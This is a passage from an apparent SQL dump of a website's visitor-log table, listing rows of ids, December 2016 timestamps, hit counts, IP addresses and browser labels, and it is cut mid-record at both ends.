78696,1481813235,2,0,2,0,'66.249.76.28',''),(78697,1481813253,1,1,0,0,'163.172.64.242','other'),(78698,1481813341,1,1,0,0,'82.207.120.216','chrome'),(78699,1481814193,1,1,0,0,'207.46.13.147','other'),(78700,1481815730,1,1,0,0,'163.172.64.228','other'),(78701,1481815824,1,1,0,0,'207.46.13.148','other'),(78702,1481816502,1,1,0,0,'46.201.112.210','firefox'),(78703,1481817412,1,1,0,0,'109.122.60.188','chrome'),(78704,1481820530,1,1,0,0,'163.172.64.227','other'),(78705,1481821085,1,1,0,0,'94.179.34.137','firefox'),(78706,1481821714,1,0,1,0,'66.249.76.28',''),(78707,1481821782,1,1,0,0,'46.229.168.71','other'),(78708,1481822103,1,1,0,0,'163.172.64.241','other'),(78709,1481823392,1,0,1,0,'66.249.76.29',''),(78710,1481823933,1,1,0,0,'66.102.9.29','chrome'),(78711,1481824042,1,1,0,0,'163.172.64.247','other'),(78712,1481824543,1,1,0,0,'163.172.64.193','other'),(78713,1481824593,1,1,0,0,'91.196.178.71','firefox'),(78714,1481824831,1,1,0,0,'178.255.215.94','other'),(78715,1481825436,1,1,0,0,'130.193.50.34','other'),(78716,1481827804,1,1,0,0,'163.172.64.248','other'),(78717,1481828220,1,1,0,0,'46.118.23.215','chrome'),(78718,1481829023,1,1,0,0,'163.172.64.246','other'),(78719,1481829429,1,1,0,0,'163.172.64.225','other'),(78720,1481829430,1,1,0,0,'46.211.250.107','chrome'),(78721,1481830465,1,0,1,0,'66.249.76.30',''),(78722,1481830798,1,1,0,0,'95.132.135.250','firefox'),(78723,1481831241,1,0,1,0,'66.249.76.28',''),(78724,1481831722,1,1,0,0,'163.172.64.216','other'),(78725,1481831980,1,1,0,0,'163.172.64.179','other'),(78726,1481832805,1,1,0,0,'180.76.15.154','other'),(78727,1481833078,1,1,0,0,'163.172.64.217','other'),(78728,1481833303,1,0,1,0,'66.249.76.30',''),(78729,1481834621,1,1,0,0,'163.172.64.244','other'),(78730,1481835760,1,1,0,0,'163.172.64.184','other'),(78731,1481837514,1,1,0,0,'178.94.2.60','chrome'),(78732,1481838827,1,1,0,0,'5.248.141.196','chrome'),(78733,1481839039,1,0,1,0,'66.249.76.30',''),(78734,1481839370,1,1,0,0,'163.172.64.216','other'),(78735,1481840798,1,1,0,0,'141.0.12.9','other'),(78736,1481843456,1,1,0,0,'180.76.15.157','other'),(78737,1481846614,1,0,1,0,'68.180.228.223',''),(78738,1481849655,1,0,1,0,'66.249.76.29',''),(78739,1481851004,1,1,0,0,'46.200.223.169','other'),(78740,1481853029,1,1,0,0,'180.76.15.148','other'),(78741,1481853042,1,1,0,0,'93.158.152.51','other'),(78742,1481853120,1,1,0,0,'163.172.64.242','other'),(78743,1481855416,1,1,0,0,'163.172.64.235','other'),(78744,1481855452,1,0,1,0,'66.249.76.30',''),(78745,1481857148,3,0,3,0,'66.249.76.30',''),(78746,1481857650,1,0,1,0,'66.249.66.180',''),(78747,1481859139,1,0,1,0,'66.249.76.29',''),(78748,1481859386,1,0,1,0,'66.249.76.30',''),(78749,1481859535,1,1,0,0,'107.178.195.156','msie'),(78750,1481859541,1,1,0,0,'204.13.201.137','msie'),(78751,1481859546,1,1,0,0,'176.214.191.63','msie'),(78752,1481861787,1,0,1,0,'66.249.76.109',''),(78753,1481862579,1,1,0,0,'95.132.149.171','chrome'),(78754,1481862753,1,0,1,0,'66.249.76.30',''),(78755,1481863276,1,0,1,0,'66.249.66.87',''),(78756,1481863830,2,0,2,0,'66.249.76.28',''),(78757,1481864491,1,1,0,0,'163.172.64.249','other'),(78758,1481865446,1,0,1,0,'66.249.76.28',''),(78759,1481865575,1,0,1,0,'66.249.76.30',''),(78760,1481867134,1,1,0,0,'91.196.178.70','firefox'),(78761,1481868146,1,1,0,0,'66.249.76.109','chrome'),(78762,1481868430,1,1,0,0,'91.196.178.68','firefox'),(78763,1481869574,1,1,0,0,'163.172.64.236','other'),(78764,1481870005,1,1,0,0,'46.133.90.215','chrome'),(78765,1481871289,1,0,1,0,'66.249.76.28',''),(78766,1481872579,1,1,0,0,'91.196.178.68','firefox'),(78767,1481872630,1,1,0,0,'94.178.16.89','chrome'),(78768,1481873352,1,1,0,0,'91.196.178.69','firefox'),(78769,1481873511,1,1,0,0,'91.196.178.68','firefox'),(78770,1481874029,1,1,0,0,'66.102.9.27','other'),(78771,1481875471,2,0,2,0,'66.249.76.29',''),(78772,1481875915,1,0,1,0,'66.249.76.28',''),(78773,1481876647,1,1,0,0,'91.196.177.46','chrome'),(78774,1481876995,1,1,0,0,'193.227.231.229','chrome'),(78775,1481877026,1,0,1,0,'66.249.76.28',''),(78776,1481877621,1,1,0,0,'163.172.64.193','other'),(78777,1481877663,1,1,0,0,'130.180.220.43','chrome'),(78778,1481877763,1,1,0,0,'91.196.177.26','chrome'),(78779,1481877864,1,1,0,0,'91.196.178.167','firefox'),(78780,1481878491,1,0,1,0,'66.249.76.30',''),(78781,1481878887,1,1,0,0,'95.133.53.45','firefox'),(78782,1481878897,1,1,0,0,'141.8.142.58','other'),(78783,1481879119,1,0,1,0,'66.249.76.28',''),(78784,1481879355,1,1,0,0,'207.46.13.148','other'),(78785,1481880596,1,0,1,0,'66.249.76.30',''),(78786,1481880782,1,0,1,0,'66.249.76.29',''),(78787,1481881147,1,1,0,0,'82.145.221.8','other'),(78788,1481881802,1,1,0,0,'95.133.2.46','firefox'),(78789,1481881832,1,1,0,0,'130.193.50.34','other'),(78790,1481881982,1,1,0,0,'141.8.183.25','other'),(78791,1481883363,1,1,0,0,'91.196.178.163','chrome'),(78792,1481883486,1,1,0,0,'91.196.177.26','chrome'),(78793,1481883985,1,0,1,0,'66.249.76.30',''),(78794,1481884869,1,1,0,0,'46.201.112.210','firefox'),(78795,1481885679,1,1,0,0,'82.145.223.20','other'),(78796,1481885882,1,1,0,0,'178.95.99.79','chrome'),(78797,1481885883,1,1,0,0,'91.196.178.67','firefox'),(78798,1481886232,1,1,0,0,'130.180.212.56','chrome'),(78799,1481886667,2,0,2,0,'66.249.76.30',''),(78800,1481887372,1,0,1,0,'66.249.76.29',''),(78801,1481887778,1,1,0,0,'199.58.86.211','other'),(78802,1481888193,1,1,0,0,'66.249.76.29','chrome'),(78803,1481888241,1,1,0,0,'66.102.9.25','other'),(78804,1481888316,1,1,0,0,'37.53.74.49','other'),(78805,1481889173,1,1,0,0,'163.172.64.253','other'),(78806,1481891317,1,1,0,0,'163.172.64.244','other'),(78807,1481891356,1,1,0,0,'66.249.76.29','chrome'),(78808,1481891463,1,0,1,0,'66.249.76.30',''),(78809,1481892048,1,1,0,0,'94.178.197.108','chrome'),(78810,1481892158,1,1,0,0,'95.135.48.66','firefox'),(78811,1481892293,1,1,0,0,'91.196.178.66','firefox'),(78812,1481892661,1,1,0,0,'193.104.16.21','chrome'),(78813,1481892780,1,1,0,0,'91.196.178.69','firefox'),(78814,1481893535,1,1,0,0,'46.201.112.210','firefox'),(78815,1481894687,1,1,0,0,'157.55.39.199','other'),(78816,1481896338,1,1,0,0,'176.15.18.134','msie'),(78817,1481896629,1,1,0,0,'94.179.15.156','chrome'),(78818,1481896644,1,1,0,0,'141.8.142.58','other'),(78819,1481896793,1,1,0,0,'163.172.64.243','other'),(78820,1481896953,1,1,0,0,'91.196.178.164','firefox'),(78821,1481898001,1,0,1,0,'66.249.76.108',''),(78822,1481898024,1,1,0,0,'163.172.64.224','other'),(78823,1481898327,1,1,0,0,'80.91.188.10','chrome'),(78824,1481898482,1,0,1,0,'66.249.76.30',''),(78825,1481898520,1,1,0,0,'163.172.64.253','other'),(78826,1481898627,1,1,0,0,'94.179.15.156','chrome'),(78827,1481899131,1,1,0,0,'91.196.178.130','chrome'),(78828,1481899744,1,0,1,0,'66.249.76.107',''),(78829,1481899971,1,1,0,0,'66.249.66.87','chrome'),(78830,1481900754,1,0,1,0,'66.249.76.29',''),(78831,1481901368,1,1,0,0,'163.172.64.235','other'),(78832,1481901578,1,1,0,0,'163.172.64.249','other'),(78833,1481901853,3,0,3,0,'66.249.76.28',''),(78834,1481902045,1,1,0,0,'207.46.13.212','other'),(78835,1481902119,1,0,1,0,'66.249.76.30',''),(78836,1481902780,1,1,0,0,'66.249.76.29','chrome'),(78837,1481902785,1,0,1,0,'66.249.76.28',''),(78838,1481902795,1,1,0,0,'163.172.64.224','other'),(78839,1481902826,1,1,0,0,'66.102.9.25','other'),(78840,1481903374,1,0,1,0,'66.249.76.30',''),(78841,1481904083,1,1,0,0,'180.76.15.12','other'),(78842,1481906478,1,1,0,0,'46.201.112.210','firefox'),(78843,1481906838,1,1,0,0,'95.24.237.247','msie'),(78844,1481907607,1,1,0,0,'176.195.121.199','msie'),(78845,1481908004,1,0,1,0,'66.249.76.89',''),(78846,1481908862,1,1,0,0,'95.221.235.206','opera'),(78847,1481908969,1,1,0,0,'66.249.76.93','chrome'),(78848,1481909196,1,0,1,0,'66.249.66.87',''),(78849,1481909969,1,1,0,0,'207.46.13.148','other'),(78850,1481911622,1,1,0,0,'207.46.13.148','other'),(78851,1481912137,1,1,0,0,'91.196.178.168','chrome'),(78852,1481912502,1,1,0,0,'95.132.53.149','chrome'),(78853,1481913141,1,1,0,0,'207.46.13.212','other'),(78854,1481913633,1,1,0,0,'91.196.178.168','chrome'),(78855,1481914892,1,1,0,0,'130.193.50.34','other'),(78856,1481917240,1,1,0,0,'66.102.9.27','other'),(78857,1481917911,1,1,0,0,'163.172.64.246','other'),(78858,1481918253,1,1,0,0,'94.179.121.215','chrome'),(78859,1481918266,1,1,0,0,'141.8.183.25','other'),(78860,1481918380,1,1,0,0,'163.172.64.250','other'),(78861,1481919545,1,1,0,0,'176.15.197.226','other'),(78862,1481921265,1,1,0,0,'176.195.96.240','chrome'),(78863,1481922428,1,1,0,0,'180.76.15.29','other'),(78864,1481922461,1,1,0,0,'95.24.154.225','firefox'),(78865,1481922861,1,1,0,0,'5.45.255.68','chrome'),(78866,1481924611,1,0,1,0,'66.249.76.30',''),(78867,1481924642,1,1,0,0,'66.249.76.107','chrome'),(78868,1481925452,3,3,0,0,'62.210.143.245','other'),(78869,1481926057,1,1,0,0,'163.172.64.226','other'),(78870,1481927462,1,0,1,0,'66.249.76.28',''),(78871,1481928146,1,1,0,0,'66.249.76.30','chrome'),(78872,1481928424,1,1,0,0,'37.115.105.208','chrome'),(78873,1481929486,1,1,0,0,'163.172.64.234','other'),(78874,1481931248,1,1,0,0,'163.172.64.244','other'),(78875,1481931695,1,1,0,0,'66.102.9.27','other'),(78876,1481932956,1,1,0,0,'66.249.76.108','chrome'),(78877,1481932973,1,1,0,0,'207.46.13.212','other'),(78878,1481934400,1,0,1,0,'66.249.66.180',''),(78879,1481934439,1,1,0,0,'93.80.63.183','chrome'),(78880,1481935759,1,1,0,0,'46.188.49.214','chrome'),(78881,1481936839,1,0,1,0,'66.249.76.30',''),(78882,1481938308,1,0,1,0,'66.249.76.29',''),(78883,1481939557,1,1,0,0,'163.172.64.180','other'),(78884,1481940268,1,1,0,0,'180.76.15.154','other'),(78885,1481941619,1,1,0,0,'163.172.64.188','other'),(78886,1481943239,1,1,0,0,'66.249.76.28','chrome'),(78887,1481944287,1,1,0,0,'180.76.15.16','other'),(78888,1481946596,1,1,0,0,'66.102.9.29','other'),(78889,1481947507,1,0,1,0,'66.249.76.29',''),(78890,1481947826,1,1,0,0,'163.172.64.246','other'),(78891,1481948456,1,1,0,0,'163.172.64.229','other'),(78892,1481949326,1,1,0,0,'107.178.195.152','msie'),(78893,1481949331,1,1,0,0,'204.13.201.137','msie'),(78894,1481951925,1,1,0,0,'94.179.3.87','firefox'),(78895,1481953053,1,1,0,0,'163.172.64.245','other'),(78896,1481953132,1,0,1,0,'66.249.76.29',''),(78897,1481954533,2,0,2,0,'66.249.66.87',''),(78898,1481955897,1,1,0,0,'163.172.64.231','other'),(78899,1481956199,1,0,1,0,'66.249.76.107',''),(78900,1481956612,1,0,1,0,'66.249.76.29',''),(78901,1481956640,2,2,0,0,'95.213.141.126','opera'),(78902,1481957634,3,3,0,0,'87.98.217.57','other'),(78903,1481959568,1,0,1,0,'66.249.76.29',''),(78904,1481960389,1,1,0,0,'207.46.13.148','other'),(78905,1481961199,1,1,0,0,'207.46.13.147','other'),(78906,1481961200,1,1,0,0,'66.102.9.25','other'),(78907,1481961296,1,0,1,0,'66.249.76.30',''),(78908,1481961312,1,0,1,0,'66.249.76.109',''),(78909,1481961665,1,0,1,0,'66.249.76.28',''),(78910,1481962110,1,1,0,0,'163.172.64.226','other'),(78911,1481963037,1,1,0,0,'66.102.9.27','chrome'),(78912,1481963129,2,0,2,0,'66.249.76.30',''),(78913,1481963236,1,0,1,0,'66.249.76.28',''),(78914,1481963335,1,0,1,0,'68.180.228.223',''),(78915,1481963408,1,1,0,0,'163.172.64.188','other'),(78916,1481964881,1,1,0,0,'163.172.64.225','other'),(78917,1481965038,1,1,0,0,'91.196.178.33','chrome'),(78918,1481965468,2,0,2,0,'66.249.76.28',''),(78919,1481965597,1,0,1,0,'66.249.76.29',''),(78920,1481965762,1,0,1,0,'66.249.66.81',''),(78921,1481966247,1,0,1,0,'66.249.76.30',''),(78922,1481966251,1,1,0,0,'91.196.178.33','chrome'),(78923,1481966635,1,0,1,0,'68.180.228.223',''),(78924,1481968059,1,1,0,0,'207.46.13.147','other'),(78925,1481968150,1,0,1,0,'66.249.76.109',''),(78926,1481968475,1,0,1,0,'68.180.228.223',''),(78927,1481968619,2,0,2,0,'66.249.76.30',''),(78929,1481969516,1,0,1,0,'66.249.76.29',''),(78930,1481969659,1,1,0,0,'163.172.64.192','other'),(78931,1481969784,1,0,1,0,'66.249.76.30',''),(78932,1481969794,1,0,1,0,'66.249.76.28',''),(78933,1481969824,1,1,0,0,'163.172.64.244','other'),(78934,1481972168,1,1,0,0,'199.58.86.211','other'),(78935,1481972928,1,0,1,0,'66.249.76.29',''),(78936,1481974662,1,0,1,0,'66.249.76.30',''),(78937,1481975130,1,0,1,0,'66.249.66.84',''),(78938,1481975503,1,1,0,0,'207.46.13.147','other'),(78939,1481975786,1,1,0,0,'5.142.11.122','chrome'),(78940,1481976282,1,1,0,0,'46.201.112.210','firefox'),(78941,1481976300,1,1,0,0,'82.145.221.127','chrome'),(78942,1481976317,1,1,0,0,'141.8.183.25','other'),(78943,1481976560,1,0,1,0,'66.249.76.30',''),(78944,1481978114,1,0,1,0,'66.249.76.30',''),(78945,1481978300,1,1,0,0,'163.172.64.253','other'),(78946,1481978736,1,1,0,0,'180.76.15.22','other'),(78947,1481978863,1,0,1,0,'66.249.66.87',''),(78948,1481980967,1,1,0,0,'207.46.13.147','other'),(78949,1481981381,1,1,0,0,'163.172.64.225','other'),(78950,1481982176,1,1,0,0,'163.172.64.180','other'),(78951,1481984299,1,1,0,0,'163.172.64.186','other'),(78952,1481985111,1,1,0,0,'207.46.13.148','other'),(78953,1481986040,1,1,0,0,'163.172.64.228','other'),(78954,1481987547,1,1,0,0,'163.172.64.253','other'),(78955,1481987861,1,1,0,0,'207.46.13.147','other'),(78956,1481989937,1,1,0,0,'66.102.9.25','other'),(78957,1481990272,1,1,0,0,'163.172.64.180','other'),(78958,1481991096,1,0,1,0,'66.249.76.28',''),(78959,1481994887,1,1,0,0,'178.255.215.94','other'),(78960,1481995317,1,1,0,0,'66.249.93.157','chrome'),(78961,1481995495,1,1,0,0,'46.211.200.148','chrome'),(78962,1481996411,1,1,0,0,'94.179.77.74','firefox'),(78963,1481997452,1,1,0,0,'130.180.220.53','chrome'),(78964,1481998117,1,1,0,0,'207.46.13.148','other'),(78965,1481999125,1,1,0,0,'66.249.66.87','chrome'),(78966,1481999131,1,1,0,0,'141.8.183.25','other'),(78967,1482000005,1,1,0,0,'66.249.76.28','chrome'),(78968,1482004446,1,1,0,0,'66.102.9.27','other'),(78969,1482006765,1,1,0,0,'163.172.64.189','other'),(78970,1482007095,1,1,0,0,'91.196.178.66','firefox'),(78971,1482009092,1,0,1,0,'68.180.229.190',''),(78972,1482011133,1,1,0,0,'163.172.64.192','other'),(78973,1482011447,1,0,1,0,'66.249.76.29',''),(78974,1482011896,2,2,0,0,'157.55.39.199','other'),(78975,1482013315,1,1,0,0,'163.172.64.185','other'),(78976,1482013890,1,1,0,0,'204.79.180.32','msie'),(78977,1482016308,1,1,0,0,'163.172.64.227','other'),(78978,1482017448,1,1,0,0,'163.172.64.217','other'),(78979,1482018752,1,1,0,0,'66.102.9.27','other'),(78980,1482019624,1,1,0,0,'109.173.52.180','other'),(78981,1482021308,1,1,0,0,'157.55.39.199','other'),(78982,1482022141,1,1,0,0,'163.172.64.179','other'),(78983,1482022592,1,1,0,0,'180.76.15.136','other'),(78984,1482022756,1,1,0,0,'66.249.76.28','chrome'),(78985,1482022869,1,1,0,0,'157.55.39.199','other'),(78986,1482024177,1,1,0,0,'163.172.64.189','other'),(78987,1482025649,1,1,0,0,'66.249.66.84','chrome'),(78988,1482028698,1,1,0,0,'163.172.64.250','other'),(78989,1482029875,1,1,0,0,'83.31.36.217','other'),(78990,1482032157,1,0,1,0,'66.249.66.87',''),(78991,1482032288,1,0,1,0,'66.249.76.29',''),(78992,1482033215,1,1,0,0,'66.102.9.29','other'),(78993,1482039918,1,1,0,0,'163.172.64.220','other'),(78994,1482042815,1,0,1,0,'66.249.76.108',''),(78995,1482045489,1,1,0,0,'180.76.15.17','other'),(78996,1482045531,1,1,0,0,'163.172.64.184','other'),(78997,1482047300,1,1,0,0,'198.50.131.46','other'),(78998,1482047587,1,1,0,0,'66.102.9.29','other'),(78999,1482047948,1,0,1,0,'66.249.76.107',''),(79000,1482049435,1,1,0,0,'157.55.39.199','other'),(79001,1482049650,1,1,0,0,'163.172.64.224','other'),(79002,1482051955,1,0,1,0,'66.249.76.30',''),(79003,1482052321,1,1,0,0,'163.172.64.236','other'),(79004,1482052619,1,1,0,0,'176.15.28.246','msie'),(79005,1482053351,1,1,0,0,'163.172.64.223','other'),(79006,1482054965,1,1,0,0,'163.172.64.177','other'),(79007,1482055540,3,0,3,0,'66.249.76.109',''),(79008,1482057966,1,1,0,0,'173.212.204.187','other'),(79009,1482058299,1,1,0,0,'37.54.19.86','firefox'),(79010,1482061048,1,1,0,0,'163.172.64.192','other'),(79011,1482062084,1,1,0,0,'66.102.9.27','other'),(79012,1482063771,1,1,0,0,'95.132.4.32','chrome'),(79013,1482064998,1,1,0,0,'195.154.181.162','chrome'),(79014,1482065151,1,1,0,0,'62.212.73.211','other'),(79015,1482065352,2,2,0,0,'66.249.76.109','chrome'),(79016,1482066361,1,1,0,0,'66.249.76.107','chrome'),(79017,1482067250,1,1,0,0,'66.249.76.109','chrome'),(79018,1482068370,1,0,1,0,'66.249.76.28',''),(79019,1482068836,1,1,0,0,'194.12.78.48','chrome'),(79020,1482069720,1,1,0,0,'66.249.76.29','chrome'),(79021,1482070474,1,1,0,0,'163.172.64.220','other'),(79022,1482072704,2,2,0,0,'194.44.17.115','chrome'),(79023,1482073739,1,0,1,0,'66.249.76.28',''),(79024,1482074103,1,1,0,0,'91.196.178.34','chrome'),(79025,1482076044,1,1,0,0,'95.134.202.69','chrome'),(79026,1482076065,1,1,0,0,'130.193.50.34','other'),(79027,1482076481,1,1,0,0,'66.102.9.25','other'),(79028,1482077218,1,1,0,0,'91.196.178.164','chrome'),(79029,1482078626,1,1,0,0,'163.172.64.243','other'),(79030,1482080038,1,1,0,0,'95.132.133.68','chrome'),(79031,1482080681,1,1,0,0,'207.46.13.22','other'),(79032,1482081705,1,0,1,0,'66.249.76.29',''),(79033,1482082755,1,1,0,0,'130.180.216.23','chrome'),(79034,1482082761,1,1,0,0,'130.193.51.19','other'),(79035,1482083859,1,1,0,0,'37.54.19.86','firefox'),(79036,1482084971,1,0,1,0,'66.249.76.28',''),(79037,1482085161,1,1,0,0,'66.249.76.108','chrome'),(79038,1482085178,2,1,1,0,'66.249.76.28',''),(79039,1482085347,1,1,0,0,'163.172.64.241','other'),(79040,1482086068,1,1,0,0,'37.54.19.86','firefox'),(79041,1482086397,1,0,1,0,'66.249.76.28',''),(79042,1482088164,1,0,1,0,'68.180.228.223',''),(79043,1482088390,1,1,0,0,'163.172.64.222','other'),(79044,1482089181,1,0,1,0,'66.249.66.180',''),(79045,1482089265,1,1,0,0,'163.172.64.199','other'),(79046,1482090924,1,1,0,0,'66.102.9.25','other'),(79047,1482091370,1,0,1,0,'66.249.76.29',''),(79048,1482091838,1,0,1,0,'66.249.76.28',''),(79049,1482092678,1,1,0,0,'178.64.62.114','chrome'),(79050,1482093536,1,1,0,0,'78.111.187.223','chrome'),(79051,1482094860,1,1,0,0,'163.172.64.182','other'),(79052,1482095494,1,1,0,0,'207.46.13.148','other'),(79053,1482095699,1,1,0,0,'163.172.64.253','other'),(79054,1482096005,2,0,2,0,'66.249.76.29',''),(79055,1482096090,2,2,0,0,'157.55.39.199','other'),(79056,1482097217,1,1,0,0,'163.172.64.182','other'),(79057,1482097915,1,0,1,0,'66.249.76.30',''),(79058,1482099488,1,0,1,0,'66.249.76.30',''),(79059,1482099531,1,1,0,0,'163.172.64.245','other'),(79060,1482099814,1,0,1,0,'66.249.76.107',''),(79061,1482100115,1,0,1,0,'66.249.76.109',''),(79062,1482101307,1,1,0,0,'207.46.13.148','other'),(79063,1482101378,1,1,0,0,'157.55.39.199','other'),(79064,1482102646,1,0,1,0,'66.249.76.28',''),(79065,1482102688,1,1,0,0,'163.172.64.224','other'),(79066,1482105052,1,1,0,0,'163.172.64.181','other'),(79067,1482105740,1,1,0,0,'66.102.9.29','other'),(79068,1482107531,2,0,2,0,'66.249.76.29',''),(79069,1482107598,1,1,0,0,'163.172.64.185','other'),(79070,1482107648,1,1,0,0,'163.172.64.226','other'),(79071,1482107982,1,1,0,0,'163.172.64.253','other'),(79072,1482108775,1,1,0,0,'46.229.168.69','other'),(79073,1482110566,1,0,1,0,'66.249.76.107',''),(79074,1482110697,1,1,0,0,'66.249.76.29','chrome'),(79075,1482110716,1,1,0,0,'66.249.76.109','chrome'),(79076,1482111916,1,0,1,0,'68.180.228.223',''),(79077,1482111971,2,0,2,0,'66.249.76.28',''),(79078,1482112101,1,1,0,0,'157.55.39.199','other'),(79079,1482112655,1,0,1,0,'66.249.76.29',''),(79080,1482115254,1,1,0,0,'163.172.64.217','other'),(79081,1482115484,1,0,1,0,'66.249.76.29',''),(79082,1482115972,1,0,1,0,'66.249.66.81',''),(79083,1482116152,1,1,0,0,'207.46.13.22','other'),(79084,1482116233,1,1,0,0,'91.196.178.35','chrome'),(79085,1482116584,1,1,0,0,'163.172.64.244','other'),(79086,1482117116,1,1,0,0,'157.55.39.199','other'),(79087,1482117468,3,3,0,0,'91.196.178.35','chrome'),(79088,1482118117,1,0,1,0,'66.249.66.87',''),(79089,1482118557,2,0,2,0,'66.249.66.81',''),(79090,1482119019,1,0,1,0,'66.249.76.30',''),(79091,1482119257,1,1,0,0,'163.172.64.192','other'),(79092,1482119274,1,1,0,0,'207.46.13.22','other'),(79093,1482119287,1,0,1,0,'66.249.76.29',''),(79094,1482119793,1,1,0,0,'66.102.9.27','other'),(79095,1482120086,1,0,1,0,'66.249.76.109',''),(79096,1482120308,1,0,1,0,'66.249.76.28',''),(79097,1482121083,1,1,0,0,'46.229.168.72','other'),(79098,1482121092,1,0,1,0,'66.249.76.30',''),(79099,1482121521,1,0,1,0,'66.249.66.87',''),(79100,1482121605,1,0,1,0,'66.249.76.29',''),(79101,1482122657,1,1,0,0,'66.249.76.29','chrome'),(79102,1482122660,1,1,0,0,'66.249.76.107','chrome'),(79103,1482123090,1,0,1,0,'66.249.76.28',''),(79104,1482123237,1,0,1,0,'66.249.76.30',''),(79105,1482125954,1,1,0,0,'141.8.142.58','other'),(79106,1482126259,1,0,1,0,'66.249.76.28',''),(79107,1482126762,1,1,0,0,'91.196.178.67','firefox'),(79108,1482127248,2,0,2,0,'66.249.76.28',''),(79109,1482127284,1,1,0,0,'91.196.178.40','chrome'),(79110,1482127321,2,0,2,0,'66.249.76.30',''),(79111,1482127349,1,1,0,0,'46.200.220.98','chrome'),(79112,1482127625,1,1,0,0,'91.196.178.72','firefox'),(79113,1482128572,1,1,0,0,'66.102.9.27','chrome'),(79114,1482129123,1,1,0,0,'91.196.178.68','firefox'),(79115,1482129140,1,1,0,0,'91.196.178.67','firefox'),(79116,1482130287,2,2,0,0,'91.196.179.134','chrome'),(79117,1482130447,1,1,0,0,'157.55.39.199','other'),(79118,1482130457,1,1,0,0,'91.196.178.71','chrome'),(79119,1482130557,1,1,0,0,'91.196.178.68','firefox'),(79120,1482131405,1,0,1,0,'66.249.76.30',''),(79121,1482131417,1,0,1,0,'66.249.76.29',''),(79122,1482131575,1,1,0,0,'91.196.178.71','chrome'),(79123,1482131866,1,1,0,0,'163.172.64.236','other'),(79124,1482132148,1,1,0,0,'195.28.31.199','chrome'),(79125,1482132261,1,1,0,0,'91.196.177.26','chrome'),(79126,1482132312,1,1,0,0,'91.196.178.72','chrome'),(79127,1482132569,1,1,0,0,'91.196.178.70','chrome'),(79128,1482133623,1,1,0,0,'91.196.178.68','firefox'),(79129,1482134116,1,1,0,0,'91.196.177.46','firefox'),(79130,1482134239,1,1,0,0,'66.102.9.27','other'),(79131,1482134887,1,1,0,0,'163.172.64.223','other'),(79132,1482135255,1,1,0,0,'91.196.178.33','firefox'),(79133,1482135351,1,1,0,0,'91.196.178.136','chrome'),(79134,1482135556,1,1,0,0,'91.196.176.13','chrome'),(79135,1482136720,1,1,0,0,'163.172.64.186','other'),(79136,1482136820,1,0,1,0,'66.249.66.183',''),(79137,1482137837,1,1,0,0,'163.172.64.233','other'),(79138,1482137877,1,1,0,0,'178.93.41.105','chrome'),(79139,1482137906,1,1,0,0,'141.8.183.25','other'),(79140,1482137920,3,3,0,0,'148.251.190.162','other'),(79141,1482138471,1,1,0,0,'163.172.64.245','other'),(79142,1482138473,1,1,0,0,'91.196.177.15','chrome'),(79143,1482138516,1,0,1,0,'66.249.66.87',''),(79144,1482138622,1,0,1,0,'66.249.76.28',''),(79145,1482139710,1,1,0,0,'94.179.76.97','firefox'),(79146,1482140225,1,1,0,0,'91.196.178.135','chrome'),(79147,1482141040,1,1,0,0,'91.196.177.26','chrome'),(79148,1482141467,1,1,0,0,'63.243.252.152','other'),(79149,1482141805,1,1,0,0,'163.172.64.188','other'),(79150,1482142366,1,0,1,0,'66.249.76.29',''),(79151,1482143147,1,1,0,0,'193.108.50.39','chrome'),(79152,1482143409,1,1,0,0,'91.196.178.133','firefox'),(79153,1482144148,1,1,0,0,'37.54.21.21','chrome'),(79154,1482144914,1,0,1,0,'66.249.76.108',''),(79155,1482145782,1,1,0,0,'46.219.252.168','firefox'),(79156,1482145996,1,1,0,0,'91.196.177.26','chrome'),(79157,1482146003,1,1,0,0,'109.173.100.22','opera'),(79158,1482146382,1,1,0,0,'37.54.21.10','chrome'),(79159,1482147196,1,1,0,0,'93.72.49.133','other'),(79160,1482147360,1,1,0,0,'91.196.177.26','chrome'),(79161,1482147535,1,1,0,0,'80.91.162.133','chrome'),(79162,1482147740,1,1,0,0,'130.180.218.217','firefox'),(79163,1482148595,1,1,0,0,'66.102.9.27','other'),(79164,1482148894,1,1,0,0,'82.145.220.119','chrome'),(79165,1482149739,1,1,0,0,'91.196.178.68','firefox'),(79166,1482150436,1,0,1,0,'66.249.76.28',''),(79167,1482150881,1,1,0,0,'46.211.155.76','other'),(79168,1482151018,1,0,1,0,'66.249.76.29',''),(79169,1482151348,1,1,0,0,'163.172.64.220','other'),(79170,1482152273,1,0,1,0,'66.249.76.29',''),(79171,1482152665,1,1,0,0,'91.196.178.161','chrome'),(79172,1482152804,1,0,1,0,'66.249.76.28',''),(79173,1482153063,1,1,0,0,'66.249.66.180','chrome'),(79174,1482153173,1,1,0,0,'91.196.178.68','firefox'),(79175,1482153937,1,0,1,0,'66.249.76.28',''),(79176,1482154083,1,1,0,0,'82.145.220.119','chrome'),(79177,1482154119,2,2,0,0,'91.196.176.13','chrome'),(79178,1482154252,1,1,0,0,'46.229.168.68','other'),(79179,1482155879,1,1,0,0,'91.124.49.137','firefox'),(79180,1482155906,1,1,0,0,'130.193.51.19','other'),(79181,1482155951,1,1,0,0,'66.102.9.40','chrome'),(79182,1482156010,1,1,0,0,'94.179.225.193','firefox'),(79183,1482156689,1,1,0,0,'163.172.64.217','other'),(79184,1482156812,1,0,1,0,'66.249.76.109',''),(79185,1482157481,1,1,0,0,'180.76.15.25','other'),(79186,1482157920,1,0,1,0,'66.249.76.109',''),(79187,1482157965,1,1,0,0,'91.229.121.3','firefox'),(79188,1482158052,1,1,0,0,'91.196.177.46','chrome'),(79189,1482158070,1,1,0,0,'91.196.177.26','chrome'),(79190,1482158182,1,1,0,0,'91.196.177.46','firefox'),(79191,1482158253,1,1,0,0,'109.251.210.100','chrome'),(79192,1482158431,1,1,0,0,'91.196.178.69','firefox'),(79193,1482158513,1,1,0,0,'163.172.64.223','other'),(79194,1482159248,1,1,0,0,'66.249.93.157','chrome'),(79195,1482159436,1,1,0,0,'91.196.178.68','firefox'),(79196,1482159820,1,1,0,0,'66.249.76.109','chrome'),(79197,1482159913,1,1,0,0,'95.134.96.91','chrome'),(79198,1482160389,1,1,0,0,'212.113.42.107','firefox'),(79199,1482160456,1,1,0,0,'91.196.177.40','chrome'),(79200,1482160910,1,1,0,0,'94.178.7.131','firefox'),(79201,1482160975,1,1,0,0,'95.134.116.254','chrome'),(79202,1482161014,1,1,0,0,'91.196.178.130','chrome'),(79203,1482161062,1,1,0,0,'163.172.64.187','other'),(79204,1482161377,1,1,0,0,'180.76.15.163','other'),(79205,1482161447,1,0,1,0,'66.249.66.87',''),(79206,1482161494,2,1,1,0,'66.249.76.29',''),(79207,1482161559